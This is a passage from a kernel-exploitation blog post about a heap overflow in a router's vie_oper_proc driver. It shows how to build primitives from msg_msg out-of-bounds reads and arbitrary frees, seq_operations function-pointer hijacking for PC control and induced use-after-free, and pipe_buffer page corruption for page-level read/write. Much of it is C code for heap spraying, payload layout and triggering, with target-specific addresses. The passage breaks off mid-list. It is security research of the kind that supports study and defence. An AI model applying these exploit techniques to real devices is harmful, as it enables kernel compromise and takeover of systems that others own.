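    struct model_seg *next;               /* first qword at the target */
    unsigned char data[MODEL_DATALEN_SEG]; /* bytes that get leaked */
};

struct model_msg {
    size_t m_ts;                          /* attacker-controlled size */
    struct model_seg *next;               /* attacker-controlled pointer */
    unsigned char data[MODEL_DATALEN_MSG];
};

static size_t min_sz(size_t a, size_t b) { return a &lt; b ? a : b; }

/* Copy a message out the way the model assumes the kernel does: the first
 * chunk from the message itself, then the remainder from each segment in
 * the chain. Returns the number of bytes written to dest. */
size_t model_store_msg(unsigned char *dest, const struct model_msg *msg,
                       size_t bufsz)
{
    size_t len = min_sz(bufsz, msg-&gt;m_ts);
    size_t alen = min_sz(len, MODEL_DATALEN_MSG);
    size_t copied = alen;

    memcpy(dest, msg-&gt;data, alen);
    for (const struct model_seg *seg = msg-&gt;next; seg != NULL; seg = seg-&gt;next) {
        len -= alen;
        alen = min_sz(len, MODEL_DATALEN_SEG);
        memcpy(dest + copied, seg-&gt;data, alen);
        copied += alen;
    }
    return copied;
}
</code></pre></div></div>

<p>Two things fall out of this model. The segment only contributes bytes when <code class="language-plaintext highlighter-rouge">m_ts</code> is larger than what fits in the first chunk, so the size still has to be inflated alongside the pointer. And the first pointer-sized value at the target address is treated as the next link in the chain, so it needs to be NULL (or another readable address) for the walk to end cleanly.</p>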

<p>There’s an additional side-effect that’s triggered by this technique which is worth discussing.
After the message is successfully read back from the queue in <code class="language-plaintext highlighter-rouge">do_msgrcv()</code>, that <code class="language-plaintext highlighter-rouge">msg_msg</code> will be
passed to <code class="language-plaintext highlighter-rouge">free_msg()</code>, which will loop through the linked list of <code class="language-plaintext highlighter-rouge">msg_msgseg</code> pointers starting at
<code class="language-plaintext highlighter-rouge">msg_msg.next</code> and pass each one to <code class="language-plaintext highlighter-rouge">kfree()</code>. In other words, an arbitrary address free! This
option does have one major constraint, though: the address used to corrupt <code class="language-plaintext highlighter-rouge">msg_msg.next</code> <em>must</em> be
a valid heap address, since <code class="language-plaintext highlighter-rouge">kfree()</code> will check to determine whether the address belongs to a slab
the allocator manages; passing a bad address here will cause a <code class="language-plaintext highlighter-rouge">BUG_ON</code> to be triggered, which will
usually cause a kernel panic.</p>

<p>I’ll hold off on discussing how this secondary primitive can be leveraged for now but keep an eye
out for the follow-up post with the full exploits for those details!</p>

<h3 id="tech-seq_operations-function-pointer-corruption">tech: seq_operations function pointer corruption</h3>

<p><strong>PoC: <code class="language-plaintext highlighter-rouge">primitives-dev-vie/vie-oper-msgmsg-stat-fctptr-01.c</code></strong></p>

<p><code class="language-plaintext highlighter-rouge">struct seq_operations</code> is <a href="https://devilinside.me/blogs/small-steps-kernel-exploitation" target="_blank">a well-known target</a>
in kernel exploitation, and for good reason: the struct is <em>nothing but function pointers</em>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">seq_operations</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">start</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="n">pos</span><span class="p">);</span>
    <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">stop</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">);</span>
    <span class="kt">void</span> <span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">next</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="n">pos</span><span class="p">);</span>
    <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">show</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div></div>

<p>If we can corrupt any of them, the kernel will jump to whatever address we write -&gt; instant PC
control. The best part is we can trigger the allocation <em>and</em> use of these pointers entirely from
userspace.</p>

<h4 id="how-it-works">how it works</h4>

<p>Files under <code class="language-plaintext highlighter-rouge">/proc</code> that use the <code class="language-plaintext highlighter-rouge">seq_file</code> interface (like <code class="language-plaintext highlighter-rouge">/proc/self/stat</code>) allocate a
<code class="language-plaintext highlighter-rouge">seq_operations</code> struct when opened. The allocation happens through
<a href="https://elixir.bootlin.com/linux/v4.4.198/source/fs/seq_file.c#L554" target="_blank"><code class="language-plaintext highlighter-rouge">single_open()</code></a>,
which creates both a <code class="language-plaintext highlighter-rouge">seq_operations</code> struct and a <code class="language-plaintext highlighter-rouge">seq_file</code> struct. The <code class="language-plaintext highlighter-rouge">seq_operations</code> gets
populated with pointers to <code class="language-plaintext highlighter-rouge">single_start()</code>, <code class="language-plaintext highlighter-rouge">single_stop()</code>, <code class="language-plaintext highlighter-rouge">single_next()</code>, and a <code class="language-plaintext highlighter-rouge">show()</code>
handler specific to the file being opened.</p>

<p>When you call <code class="language-plaintext highlighter-rouge">read()</code> on the file descriptor for one of these types of files,
<a href="https://elixir.bootlin.com/linux/v4.4.198/source/fs/seq_file.c#L233" target="_blank"><code class="language-plaintext highlighter-rouge">seq_read()</code></a>
dispatches through these function pointers:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* in seq_read() */</span>
<span class="n">pos</span> <span class="o">=</span> <span class="n">m</span><span class="o">-&gt;</span><span class="n">index</span><span class="p">;</span>
<span class="n">p</span> <span class="o">=</span> <span class="n">m</span><span class="o">-&gt;</span><span class="n">op</span><span class="o">-&gt;</span><span class="n">start</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pos</span><span class="p">);</span>        <span class="c1">// &lt;-- calls through our pointer</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
    <span class="p">...</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">m</span><span class="o">-&gt;</span><span class="n">op</span><span class="o">-&gt;</span><span class="n">show</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>      <span class="c1">// &lt;-- and this one</span>
    <span class="p">...</span>
    <span class="n">p</span> <span class="o">=</span> <span class="n">m</span><span class="o">-&gt;</span><span class="n">op</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pos</span><span class="p">);</span>  <span class="c1">// &lt;-- and this one</span>
    <span class="p">...</span>
    <span class="n">m</span><span class="o">-&gt;</span><span class="n">op</span><span class="o">-&gt;</span><span class="n">stop</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>            <span class="c1">// &lt;-- and this one</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So the plan is: spray <code class="language-plaintext highlighter-rouge">seq_operations</code> by opening a bunch of <code class="language-plaintext highlighter-rouge">/proc/self/stat</code> file descriptors,
use the heap overflow to corrupt the function pointers in one of them, then call <code class="language-plaintext highlighter-rouge">read()</code>
on each fd to trigger the corrupted pointer. If the corruption landed, the kernel jumps to
whatever address we wrote.</p>

<p>One detail worth noting: <code class="language-plaintext highlighter-rouge">seq_operations</code> is only 32 bytes (<code class="language-plaintext highlighter-rouge">0x20</code>), which on most kernels would
put it in <code class="language-plaintext highlighter-rouge">kmalloc-32</code> or similar. This technique requires <code class="language-plaintext highlighter-rouge">seq_operations</code> to share a slab cache
with the overflow target — which is the case here because the kernel on the WAX206 lacks smaller
general-purpose caches (see target-specific notes).</p>

<h4 id="heap-grooming-setup-1">heap grooming setup</h4>

<p>The heap grooming setup for this approach is slightly different vs. the OOB read described in the
previous section so let’s go over it real quick.</p>

<p>We’re targeting the <code class="language-plaintext highlighter-rouge">seq_operations</code> struct, which gets allocated when we open <code class="language-plaintext highlighter-rouge">/proc/self/stat</code>.
Theoretically, we could just use that to do all of the heap spraying by opening a ton of file
descriptors for <code class="language-plaintext highlighter-rouge">/proc/self/stat</code>, but in practice there are limits to how many fds we’re allowed to
open at once and that might be too restrictive depending on how much we need to spray to exhaust the
active and partial slabs. To get around this, we just use <code class="language-plaintext highlighter-rouge">msg_msg</code> to do the initial spray which
exhausts the slabs and spray the <code class="language-plaintext highlighter-rouge">seq_operations</code> structs into a hole opened up in the <code class="language-plaintext highlighter-rouge">msg_msg</code>
spray.</p>

<p>In full, the sequence is:</p>

<ol>
  <li>Spray <code class="language-plaintext highlighter-rouge">msg_msg</code> to exhaust <code class="language-plaintext highlighter-rouge">kmalloc-128</code></li>
  <li>Open holes in the <code class="language-plaintext highlighter-rouge">msg_msg</code> spray (a sequential block near the tail end)</li>
  <li>Spray <code class="language-plaintext highlighter-rouge">seq_operations</code> by opening <code class="language-plaintext highlighter-rouge">/proc/self/stat</code> (these fill the holes)</li>
  <li>Open holes in the <code class="language-plaintext highlighter-rouge">seq_operations</code> spray (by closing every other fd in the spray)</li>
  <li>Trigger the overflow; it fills a hole adjacent to a remaining <code class="language-plaintext highlighter-rouge">seq_operations</code> struct</li>
</ol>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// spray msg_msg first</span>
    <span class="n">init_msgq</span><span class="p">(</span><span class="n">qids_0</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">);</span>
    <span class="n">msgq_spray</span><span class="p">(</span><span class="n">qids_0</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">,</span> <span class="n">dummy</span><span class="p">,</span> <span class="n">ACTIVE_BODY_SIZE</span><span class="p">);</span>

    <span class="c1">// open up a hole from those allocations near the tail end</span>
    <span class="kt">int</span> <span class="n">hole_start</span> <span class="o">=</span> <span class="n">MSG_COUNT</span> <span class="o">-</span> <span class="mi">140</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">hole_end</span> <span class="o">=</span> <span class="n">MSG_COUNT</span> <span class="o">-</span> <span class="mi">100</span><span class="p">;</span>
    <span class="n">msgq_open_holes_range</span><span class="p">(</span><span class="n">qids_0</span><span class="p">,</span> <span class="n">hole_start</span><span class="p">,</span> <span class="n">hole_end</span><span class="p">,</span> <span class="n">MTYPE_ORIG</span><span class="p">,</span> <span class="n">ACTIVE_BODY_SIZE</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>

    <span class="c1">// fill the holes up with seq_operations allocations</span>
    <span class="n">fd_spray_init</span><span class="p">(</span><span class="n">fds</span><span class="p">,</span> <span class="n">FDSPRAY_SIZE</span><span class="p">,</span> <span class="n">TARGET_OPEN_PATH</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="o">|</span><span class="n">O_NOCTTY</span><span class="p">);</span>

    <span class="c1">// open interleaving holes in seq_operations allocs to prepare for the corruption step</span>
    <span class="n">fd_open_holes_even</span><span class="p">(</span><span class="n">fds</span><span class="p">,</span> <span class="n">FDSPRAY_SIZE</span><span class="p">);</span>
</code></pre></div></div>
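<p>The fd spray helpers used above aren't shown in this post, so here's a minimal sketch of what helpers like them might look like. The names <code class="language-plaintext highlighter-rouge">sketch_fd_spray()</code> and <code class="language-plaintext highlighter-rouge">sketch_fd_open_holes_even()</code> are made up for illustration and are not the PoC's actual implementations; the only assumption is that each <code class="language-plaintext highlighter-rouge">open()</code> of the target path costs one <code class="language-plaintext highlighter-rouge">seq_operations</code> allocation and each <code class="language-plaintext highlighter-rouge">close()</code> gives it back.</p>

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>

/* Hypothetical stand-in for the PoC's fd_spray_init(): open `path` `count`
 * times and record the descriptors. Returns how many opens succeeded. */
size_t sketch_fd_spray(int *fds, size_t count, const char *path, int flags)
{
    assert(fds != NULL && path != NULL);
    size_t opened = 0;
    for (size_t i = 0; i < count; i++) {
        fds[i] = open(path, flags);
        if (fds[i] < 0)
            break;              /* most likely hit the open-fd limit */
        opened++;
    }
    /* mark the unopened tail so later passes can skip it */
    for (size_t i = opened; i < count; i++)
        fds[i] = -1;
    return opened;
}

/* Hypothetical stand-in for fd_open_holes_even(): close every even-indexed
 * descriptor, leaving the odd-indexed ones open. */
void sketch_fd_open_holes_even(int *fds, size_t count)
{
    for (size_t i = 0; i < count; i += 2) {
        if (fds[i] >= 0) {
            close(fds[i]);
            fds[i] = -1;
        }
    }
}
```

<p>Setting closed slots to <code class="language-plaintext highlighter-rouge">-1</code> keeps the later trigger loop simple: anything still non-negative is a candidate for a corrupted <code class="language-plaintext highlighter-rouge">seq_operations</code>.</p>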

<h4 id="constructing-the-payload-to-corrupt-seq_operations">constructing the payload to corrupt seq_operations</h4>

<p>The payload for this technique is about as simple as it gets. <code class="language-plaintext highlighter-rouge">seq_operations</code> is 32 bytes of
nothing but function pointers; all we need to write is four 8-byte addresses. Since the overflow
is linear, those values land directly over <code class="language-plaintext highlighter-rouge">start</code>, <code class="language-plaintext highlighter-rouge">stop</code>, <code class="language-plaintext highlighter-rouge">next</code>, and <code class="language-plaintext highlighter-rouge">show</code> in order.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">fake_seqops</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">start</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">stop</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">next</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">show</span><span class="p">;</span>
<span class="p">};</span>

<span class="kt">uint64_t</span> <span class="n">target_addr</span> <span class="o">=</span> <span class="mh">0x4141414141414140</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">fake_seqops</span> <span class="n">ops</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">.</span><span class="n">start</span> <span class="o">=</span> <span class="n">target_addr</span><span class="o">+</span><span class="mh">0x10</span><span class="p">,</span>
    <span class="p">.</span><span class="n">stop</span>  <span class="o">=</span> <span class="n">target_addr</span><span class="o">+</span><span class="mh">0x20</span><span class="p">,</span>
    <span class="p">.</span><span class="n">next</span>  <span class="o">=</span> <span class="n">target_addr</span><span class="o">+</span><span class="mh">0x30</span><span class="p">,</span>
    <span class="p">.</span><span class="n">show</span>  <span class="o">=</span> <span class="n">target_addr</span><span class="o">+</span><span class="mh">0x40</span><span class="p">,</span>
<span class="p">};</span>
<span class="n">primitive_vie_oper_proc_oob_write</span><span class="p">(</span><span class="n">ifname</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">ops</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">ops</span><span class="p">));</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">target_addr</code> placeholder above is just a dummy value to prove we get PC control; in a real
exploit, these would be addresses of useful kernel functions or gadgets (as shown in the <code class="language-plaintext highlighter-rouge">kfree()</code>
UaF discussion below). The byte restriction from <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> is the main constraint here:
addresses cannot contain NULL bytes or whitespace (<code class="language-plaintext highlighter-rouge">0x00</code>, <code class="language-plaintext highlighter-rouge">0x09</code>, <code class="language-plaintext highlighter-rouge">0x0a</code>, <code class="language-plaintext highlighter-rouge">0x0d</code>, <code class="language-plaintext highlighter-rouge">0x20</code>). On our
target this is rarely an issue in practice, since kernel text addresses start at <code class="language-plaintext highlighter-rouge">0xffffff80...</code> and heap
addresses at <code class="language-plaintext highlighter-rouge">0xffffffc0...</code>; the fixed upper bytes of both ranges are free of restricted bytes, which leaves
only the lower bytes of each chosen address to check.</p>
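<p>Since a single bad byte anywhere in the payload truncates the write, it's worth checking candidate addresses before sending them. Here's a small sketch of such a check; the helper names are mine and the restricted set is just the five byte values listed above.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Bytes the post lists as unusable in a vie_oper_proc() payload. */
static const uint8_t RESTRICTED[] = { 0x00, 0x09, 0x0a, 0x0d, 0x20 };

/* True if any byte of buf[0..len) is one of the restricted values. */
bool has_restricted_bytes(const void *buf, size_t len)
{
    assert(buf != NULL || len == 0);
    const uint8_t *p = buf;
    for (size_t i = 0; i < len; i++)
        if (memchr(RESTRICTED, p[i], sizeof(RESTRICTED)) != NULL)
            return true;
    return false;
}

/* Convenience wrapper for a single 64-bit address. */
bool addr_has_restricted_bytes(uint64_t addr)
{
    return has_restricted_bytes(&addr, sizeof(addr));
}
```

<p>The dummy values used in the payload above pass this check, whereas something like <code class="language-plaintext highlighter-rouge">0xffffffc000080000</code> would not, because of its zero bytes.</p>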

<p>After the overflow, the fds that survived the hole-poking step (the odd-indexed ones) are the ones
that might reference a corrupted <code class="language-plaintext highlighter-rouge">seq_operations</code>. Reading from them triggers <code class="language-plaintext highlighter-rouge">seq_read()</code>, which
dispatches through the corrupted function pointers:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">FDSPRAY_SIZE</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">read</span><span class="p">(</span><span class="n">fds</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">bb</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">bb</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If the corruption landed, the kernel will attempt to call our fake <code class="language-plaintext highlighter-rouge">start</code> pointer. With dummy
values like <code class="language-plaintext highlighter-rouge">0x41414141...</code> this results in a panic at a controlled address, confirming
PC control.</p>

<p><img src="/assets/images/mtk-images/mtk-vie-seqops.png" alt="mtk-vie-seqops.png" /></p>

<h4 id="using-code-exec-primitives-to-induce-uafs">using code exec primitives to induce UaFs?</h4>

<p>Beyond direct PC control, this primitive can be used to induce use-after-frees. On a target
without KASLR or where kernel addresses can be leaked, we can point a hijacked function pointer at any
kernel function…like <code class="language-plaintext highlighter-rouge">kfree()</code>, for example.</p>

<p>In this particular case: when <code class="language-plaintext highlighter-rouge">seq_read()</code> calls <code class="language-plaintext highlighter-rouge">m-&gt;op-&gt;start(m, &amp;pos)</code>, the first argument (<code class="language-plaintext highlighter-rouge">m</code>)
is a pointer to the <code class="language-plaintext highlighter-rouge">seq_file</code> struct. If we overwrite <code class="language-plaintext highlighter-rouge">seq_operations.start()</code> with the address of
<code class="language-plaintext highlighter-rouge">kfree()</code>, then calling <code class="language-plaintext highlighter-rouge">read()</code> on the corrupted fd will call <code class="language-plaintext highlighter-rouge">kfree()</code> on the <code class="language-plaintext highlighter-rouge">seq_file</code> struct,
freeing it <em>while we still hold a file descriptor that references it</em>, i.e. use-after-free!</p>

<p>From here, a number of exploitation paths open up: reclaim the freed <code class="language-plaintext highlighter-rouge">seq_file</code> with a controlled
allocation (e.g. <code class="language-plaintext highlighter-rouge">msg_msg</code>), use the stale fd to trigger further reads/writes through the
reclaimed data, etc.</p>

<p>One practical concern worth noting: on kernels where <code class="language-plaintext highlighter-rouge">seq_operations</code> shares a cache with
<code class="language-plaintext highlighter-rouge">seq_file</code> (as is the case here), stability can be an issue. Opening holes in the spray by closing
file descriptors frees both structs, and the lack of separation means the overflow might corrupt
a <code class="language-plaintext highlighter-rouge">seq_file</code> instead of <code class="language-plaintext highlighter-rouge">seq_operations</code>.</p>

<h3 id="tech-page-level-rw-via-pipe_bufferpage-corruption">tech: page-level r/w via pipe_buffer.page corruption</h3>

<p><strong>PoC: <code class="language-plaintext highlighter-rouge">primitives-dev-vie/vie-proc-pipes-arbrw-dev2.c</code></strong></p>

<p>This technique is inspired by PageJack (<a href="https://phrack.org/issues/71/13" target="_blank">Phrack</a> writeup). The core idea:
corrupt a <code class="language-plaintext highlighter-rouge">pipe_buffer</code>’s <code class="language-plaintext highlighter-rouge">struct page</code> pointer so that normal pipe <code class="language-plaintext highlighter-rouge">read()</code>/<code class="language-plaintext highlighter-rouge">write()</code> operations
get redirected to an arbitrary physical page, giving us page-level read/write.</p>

<h4 id="the-pipe_buffer-struct">the pipe_buffer struct</h4>

<p>The Linux pipe implementation uses
<a href="https://elixir.bootlin.com/linux/v4.4.198/source/include/linux/pipe_fs_i.h#L20" target="_blank"><code class="language-plaintext highlighter-rouge">struct pipe_buffer</code></a>
to track each chunk of data in a pipe:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span><span class="p">;</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">,</span> <span class="n">len</span><span class="p">;</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">pipe_buf_operations</span> <span class="o">*</span><span class="n">ops</span><span class="p">;</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">;</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">private</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The first field, <code class="language-plaintext highlighter-rouge">page</code>, is a pointer to the <code class="language-plaintext highlighter-rouge">struct page</code> that describes the physical memory
page backing the pipe. If we can corrupt that pointer to reference a <em>different</em> <code class="language-plaintext highlighter-rouge">struct page</code>,
then reading from or writing to the pipe will operate on whatever physical page that <code class="language-plaintext highlighter-rouge">struct page</code>
describes. In other words: page-level arbitrary read/write.</p>

<h4 id="virt_to_page-targeting-a-specific-address">virt_to_page: targeting a specific address</h4>

<p>Corrupting a <code class="language-plaintext highlighter-rouge">pipe_buffer.page</code> pointer doesn’t mean writing an arbitrary kernel virtual address
into it. The <code class="language-plaintext highlighter-rouge">page</code> field holds a pointer to a <code class="language-plaintext highlighter-rouge">struct page</code>, the kernel’s metadata struct for a
physical page frame, not the virtual address of the data itself. To target a specific kernel
address, we need to figure out which <code class="language-plaintext highlighter-rouge">struct page</code> describes the physical page backing it.</p>

<p>On ARM64, the <code class="language-plaintext highlighter-rouge">struct page</code> array lives at the <code class="language-plaintext highlighter-rouge">vmemmap</code> base address, and the mapping from a
virtual address to its <code class="language-plaintext highlighter-rouge">struct page</code> is a straightforward calculation involving the physical base
address, the page shift (12 for 4K pages), and the size of <code class="language-plaintext highlighter-rouge">struct page</code> (64 bytes on this
kernel):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define VMEMMAP_BASE    0xffffffbdc0000000
#define HEAP_PHYS       0x10000000
#define STRUCT_PAGE_SZ  0x40
#define PAGE_SHIFT      12
#define PHY_MASK        0xfffffff
</span>
<span class="kt">uint64_t</span> <span class="nf">virt_to_page</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">addr</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">VMEMMAP_BASE</span>
        <span class="o">+</span> <span class="p">((</span><span class="n">HEAP_PHYS</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">)</span> <span class="o">*</span> <span class="n">STRUCT_PAGE_SZ</span><span class="p">)</span>
        <span class="o">+</span> <span class="p">(((</span><span class="n">addr</span> <span class="o">&amp;</span> <span class="n">PHY_MASK</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">)</span> <span class="o">*</span> <span class="n">STRUCT_PAGE_SZ</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The constants are target-specific and may require calibration — the physical base address and
masking depend on the device’s memory map. Once correct, the formula is deterministic: give it a
kernel virtual address, get back the <code class="language-plaintext highlighter-rouge">struct page</code> pointer to write into the corrupted
<code class="language-plaintext highlighter-rouge">pipe_buffer</code>. On systems with KASLR, the <code class="language-plaintext highlighter-rouge">vmemmap</code> base address would need to be leaked or
computed, but <code class="language-plaintext highlighter-rouge">HEAP_PHYS</code> is typically not randomized.</p>
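<p>To make the arithmetic concrete, here's a worked example using the same constants. The input address <code class="language-plaintext highlighter-rouge">0xffffffc00f2a3abc</code> is made up for illustration, and the inverse helper is my own addition for sanity-checking, not part of the PoC. Masking gives <code class="language-plaintext highlighter-rouge">0xf2a3abc</code>, shifting gives page index <code class="language-plaintext highlighter-rouge">0xf2a3</code>, and adding the base page frame number <code class="language-plaintext highlighter-rouge">0x10000</code> and multiplying by <code class="language-plaintext highlighter-rouge">0x40</code> lands at <code class="language-plaintext highlighter-rouge">0xffffffbdc07ca8c0</code>.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Constants copied from the snippet above; all are specific to the WAX206. */
#define VMEMMAP_BASE    0xffffffbdc0000000ULL
#define HEAP_PHYS       0x10000000ULL
#define STRUCT_PAGE_SZ  0x40ULL
#define PAGE_SHIFT      12
#define PHY_MASK        0xfffffffULL

/* Same calculation as above, factored so the two page indices are visible. */
uint64_t sketch_virt_to_page(uint64_t addr)
{
    uint64_t base_pfn = HEAP_PHYS >> PAGE_SHIFT;            /* 0x10000 */
    uint64_t page_idx = (addr & PHY_MASK) >> PAGE_SHIFT;
    return VMEMMAP_BASE + (base_pfn + page_idx) * STRUCT_PAGE_SZ;
}

/* Hypothetical inverse (not in the PoC): recover the masked, page-aligned
 * offset that a struct page pointer corresponds to. */
uint64_t sketch_page_to_offset(uint64_t page)
{
    assert(page >= VMEMMAP_BASE);
    uint64_t pfn = (page - VMEMMAP_BASE) / STRUCT_PAGE_SZ;
    return (pfn - (HEAP_PHYS >> PAGE_SHIFT)) << PAGE_SHIFT;
}
```

<p>Round-tripping an address through both helpers is a cheap way to catch a wrong mask or base before the value goes anywhere near a live <code class="language-plaintext highlighter-rouge">pipe_buffer</code>.</p>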

<h4 id="pipe_buffer-array-resizing">pipe_buffer array resizing</h4>

<p>One important implementation detail is that pipe buffers aren’t allocated individually; the kernel
allocates an <em>array</em> of <code class="language-plaintext highlighter-rouge">pipe_buffer</code> structs in a single allocation, stored in
<code class="language-plaintext highlighter-rouge">pipe_inode_info.bufs</code>. The default array holds 16 buffers, and at 40 bytes per struct, that’s 640
bytes – landing in <code class="language-plaintext highlighter-rouge">kmalloc-1024</code>. This is obviously a problem in cases where the vulnerable buffer
overflows in a different kmalloc cache (e.g. like the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> bug does).</p>

<p>Thankfully, <code class="language-plaintext highlighter-rouge">pipe_buffer</code> arrays are actually elastic: they can be resized using
<code class="language-plaintext highlighter-rouge">fcntl(fd, F_SETPIPE_SZ, new_size)</code>, which causes the kernel to allocate a fresh array of the new
size and copy the existing data over. The size is specified in bytes; the kernel rounds it up to a
power-of-2 number of pages, and each page needs one <code class="language-plaintext highlighter-rouge">pipe_buffer</code> entry.</p>

<p>This means you can control which slab cache the array ends up in. For <code class="language-plaintext highlighter-rouge">kmalloc-128</code>, the array needs
to hold at most 2 <code class="language-plaintext highlighter-rouge">pipe_buffer</code> structs: <code class="language-plaintext highlighter-rouge">2 × 40 = 80</code> bytes, which fits in <code class="language-plaintext highlighter-rouge">kmalloc-128</code> (at least,
it does on the WAX206).</p>
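<p>Here's a minimal sketch of the resize from userland, plus the size arithmetic. The helper names are mine, and the 40-byte struct size is the figure quoted above for this kernel. The fallback <code class="language-plaintext highlighter-rouge">#define</code>s are only there in case the libc headers hide the Linux-specific <code class="language-plaintext highlighter-rouge">fcntl</code> commands.</p>

```c
#define _GNU_SOURCE             /* exposes F_SETPIPE_SZ / F_GETPIPE_SZ in glibc */
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>

#ifndef F_SETPIPE_SZ            /* Linux values, in case the headers hide them */
#define F_SETPIPE_SZ 1031
#define F_GETPIPE_SZ 1032
#endif

/* sizeof(struct pipe_buffer) on the 64-bit v4.4 kernel discussed here. */
#define PIPE_BUFFER_SZ 40

/* Bytes the kernel would request for an array of `entries` pipe_buffers. */
size_t pipe_buf_array_bytes(size_t entries)
{
    assert(entries > 0);
    return entries * PIPE_BUFFER_SZ;
}

/* Create a pipe and ask for a capacity of `pages` pages. Returns the capacity
 * in bytes that the kernel reports afterwards, or -1 on failure. */
long make_resized_pipe(int pipefd[2], long pages)
{
    long page_sz = sysconf(_SC_PAGESIZE);
    if (pipe(pipefd) < 0)
        return -1;
    if (fcntl(pipefd[1], F_SETPIPE_SZ, (int)(pages * page_sz)) < 0) {
        close(pipefd[0]);
        close(pipefd[1]);
        return -1;
    }
    return fcntl(pipefd[0], F_GETPIPE_SZ);
}
```

<p>Checking the value returned by <code class="language-plaintext highlighter-rouge">F_GETPIPE_SZ</code> is worthwhile because the kernel is free to round the request up, which would change the entry count and therefore the cache the array lands in.</p>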

<h4 id="heap-grooming-setup-2">heap grooming setup</h4>

<p>The grooming sequence for the PoC looks like this:</p>

<ol>
  <li>Spray a large number of pipes (1024 in the PoC); this allocates <code class="language-plaintext highlighter-rouge">pipe_inode_info</code> structs
and the default-sized <code class="language-plaintext highlighter-rouge">pipe_buffer</code> arrays (neither lands in the target cache)</li>
